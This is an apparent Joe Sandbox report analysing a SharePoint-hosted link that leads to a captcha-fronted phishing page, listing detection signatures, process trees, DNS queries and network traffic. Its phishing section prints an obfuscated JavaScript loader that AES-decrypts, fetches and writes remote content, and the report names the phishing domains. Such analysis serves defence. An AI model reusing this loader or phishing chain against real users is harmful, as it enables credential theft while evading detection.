Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://dzentec-my.sharepoint.com/:u:/g/personal/i_lahmer_entec-dz_com/EdYp5IxQ-uxJivnPAqSzv40BZiCX7sphz7Kj8JDyRBKqpQ?e=wqutC4

Overview

General Information

Sample URL:https://dzentec-my.sharepoint.com/:u:/g/personal/i_lahmer_entec-dz_com/EdYp5IxQ-uxJivnPAqSzv40BZiCX7sphz7Kj8JDyRBKqpQ?e=wqutC4
Analysis ID:1545996

Detection

Score:48
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected landing page (webpage, office document or email)
Phishing site detected (based on shot match)
HTML body contains low number of good links
HTML body with high number of embedded SVGs detected
HTML page contains hidden javascript code
HTML title does not match URL
Stores files to the Windows start menu directory
Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)

Classification

Process Tree

  • System is w10x64_ra
  • chrome.exe (PID: 6188 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
    • chrome.exe (PID: 6412 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2112 --field-trial-handle=2000,i,9301838728997033839,5784938270291284048,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
    • msedge.exe (PID: 5676 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" -ie-mode-file-url -- "C:\Users\user\Downloads\Drawing 1.vsdx" MD5: 69222B8101B0601CC6663F8381E7E00F)
      • msedge.exe (PID: 2528 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2160 --field-trial-handle=1980,i,4769699315146686337,1796002590068579978,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • chrome.exe (PID: 7076 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://dzentec-my.sharepoint.com/:u:/g/personal/i_lahmer_entec-dz_com/EdYp5IxQ-uxJivnPAqSzv40BZiCX7sphz7Kj8JDyRBKqpQ?e=wqutC4" MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
  • msedge.exe (PID: 7280 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" -ie-mode-file-url --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate -- "C:\Users\user\Downloads\Drawing 1.vsdx" MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 8024 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1884 --field-trial-handle=1968,i,14033886301976861225,6199934012733118347,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 2132 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6468 --field-trial-handle=1968,i,14033886301976861225,6199934012733118347,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 2968 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6748 --field-trial-handle=1968,i,14033886301976861225,6199934012733118347,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 5256 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-GB --service-sandbox-type=collections --mojo-platform-channel-handle=6828 --field-trial-handle=1968,i,14033886301976861225,6199934012733118347,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 3704 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --lang=en-GB --service-sandbox-type=service --mojo-platform-channel-handle=8036 --field-trial-handle=1968,i,14033886301976861225,6199934012733118347,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 5328 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" -ie-mode-file-url -- "C:\Users\user\Downloads\Drawing 1.vsdx" MD5: 69222B8101B0601CC6663F8381E7E00F)
      • msedge.exe (PID: 7252 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2228 --field-trial-handle=2036,i,10329489673553820088,5807421228779117729,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 1036 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --lang=en-GB --service-sandbox-type=service --mojo-platform-channel-handle=8652 --field-trial-handle=1968,i,14033886301976861225,6199934012733118347,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • cleanup

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

Phishing

barindex
Phishing site detected (based on shot match)
Source: https://alinefrasca.sbs/pktcr/Matcher: Template: captcha matched
Source: https://alinefrasca.sbs/pktcr/Matcher: Template: captcha matched
Source: https://alinefrasca.sbs/pktcr/HTTP Parser: Number of links: 0
Source: https://dzentec-my.sharepoint.com/:u:/g/personal/i_lahmer_entec-dz_com/EdYp5IxQ-uxJivnPAqSzv40BZiCX7sphz7Kj8JDyRBKqpQ?rtime=_YMVaZT53EgHTTP Parser: Total embedded SVG size: 238648
Source: https://dzentec-my.sharepoint.com/personal/i_lahmer_entec-dz_com/_layouts/15/Doc.aspx?sourcedoc=%7B8ce429d6-fa50-49ec-8af9-cf02a4b3bf8d%7D&action=default&slrid=c0435fa1-1082-0000-2d67-d62c612b4258&originalPath=aHR0cHM6Ly9kemVudGVjLW15LnNoYXJlcG9pbnQuY29tLzp1Oi9nL3BlcnNvbmFsL2lfbGFobWVyX2VudGVjLWR6X2NvbS9FZFlwNUl4US11eEppdm5QQXFTenY0MEJaaUNYN3NwaHo3S2o4SkR5UkJLcXBRP3J0aW1lPV9ZTVZhWlQ1M0Vn&CID=2afa1aa9-0319-40b6-a9ad-adc2c010190c&_SRM=0:G:68HTTP Parser: Base64 decoded: {"typ":"JWT","alg":"RS256","x5t":"uXehQJPleVjNCbakUhGD6IyFQQk"}
Source: https://alinefrasca.sbs/pktcr/HTTP Parser: Title: Adrenaline Rush Motorsports - cooklght.ru does not match URL
Source: https://alinefrasca.sbs/pktcr/HTTP Parser: asyncfunctionfacilitator(xenophobic) { var{a,b,c,d}= json.parse(xenophobic); return cryptojs.aes.decrypt(a, cryptojs.pbkdf2(cryptojs.enc.hex.parse(d),cryptojs.enc.hex.parse(b), {hasher:cryptojs.algo.sha512, keysize: 64/8, iterations: 999}), {iv:cryptojs.enc.hex.parse(c)}).tostring(cryptojs.enc.utf8); } (async() => {document.write(awaitfacilitator(await (await fetch(awaitfacilitator(atob(`eyjhijoiruhyrky4qxdhtxpiuvcxzzz4wvwvbst1tgtmwudwwhrwbehueexhm0dkmxm9iiwiyyi6imewodnjmtg5ywqwywfky2zlmgrkngjjyjc5mzrhnjqwiiwiyii6imfintc5ogexnti5ndyxztrinta1otvkmdrhmgvhntk5zgi2m2nmmme0odk0mwuzzmvmowvhnjkzmdy4yjuymjc3nmm3otljyjc3mtu0otlkztvkztllytg5n2nhyju5ota2mzuxnju1zgfiztexnwe5nte0odiynddjmwvkyjzmztdhn2fmmze4zgywyjlmyja3zddmm2u5odllnwrmn2i3zgmyotk2ztvhmwe4zgu4zjm2mduxmgvmotmwmtiznwfmywyxzme3n2qymgeynja0mgrknzc2zja1nzk2mzu5nmq0ytrkm2rlzmu0m2rimju2mdjkztk1nmmzodu0ywnjnzgxm2e2nwe3mwiymtbmmtm5nde3mje5mzu4nwq4otcwotqxztayzty5ndhhzgy1n2q5ymm3odhjnje1nju2mgjhodrlnzgyodhi...
Source: https://alinefrasca.sbs/pktcr/HTTP Parser: No favicon
Source: https://alinefrasca.sbs/pktcr/HTTP Parser: No favicon
Source: https://alinefrasca.sbs/pktcr/HTTP Parser: No favicon
Source: https://alinefrasca.sbs/pktcr/HTTP Parser: No favicon
Source: https://alinefrasca.sbs/pktcr/HTTP Parser: No <meta name="author".. found
Source: https://alinefrasca.sbs/pktcr/HTTP Parser: No <meta name="copyright".. found
Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.17:49746 version: TLS 1.2
Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.17:49948 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.126.31.69:443 -> 192.168.2.17:49992 version: TLS 1.2
Source: chrome.exeMemory has grown: Private usage: 25MB later: 36MB
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.13
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.13
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.13
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.13
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.13
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.13
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficDNS traffic detected: DNS query: dzentec-my.sharepoint.com
Source: global trafficDNS traffic detected: DNS query: common.online.office.com
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: visioonline.nel.measure.office.net
Source: global trafficDNS traffic detected: DNS query: alinefrasca.sbs
Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: storage.live.com
Source: global trafficDNS traffic detected: DNS query: euc-common.online.office.com
Source: global trafficDNS traffic detected: DNS query: messaging.engagement.office.com
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: cooklght.ru
Source: global trafficDNS traffic detected: DNS query: cdn.jsdelivr.net
Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: bzib.nelreports.net
Source: global trafficDNS traffic detected: DNS query: clients2.googleusercontent.com
Source: global trafficDNS traffic detected: DNS query: chrome.cloudflare-dns.com
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50054
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50053
Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50056
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50055
Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50058
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50057
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50059
Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50061
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50060
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50056 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
Source: unknownNetwork traffic detected: HTTP traffic on port 49943 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49963
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49961
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49960
Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50057 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49680 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49957
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49952
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49951
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50051 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49947
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
Source: unknownNetwork traffic detected: HTTP traffic on port 50061 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49945 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49676 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50055 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
Source: unknownNetwork traffic detected: HTTP traffic on port 50049 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49957 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50038
Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50050 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50041
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50042
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50047
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50049
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50048
Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50050
Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50052
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50051
Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
Source: unknownNetwork traffic detected: HTTP traffic on port 50013 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50042 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50059 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50060 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49691
Source: unknownNetwork traffic detected: HTTP traffic on port 50053 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49947 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49963 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
Source: unknownNetwork traffic detected: HTTP traffic on port 49677 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
Source: unknownNetwork traffic detected: HTTP traffic on port 50054 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49691 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50052 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
Source: unknownNetwork traffic detected: HTTP traffic on port 49925 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49960 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49927
Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49925
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49924
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49922
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
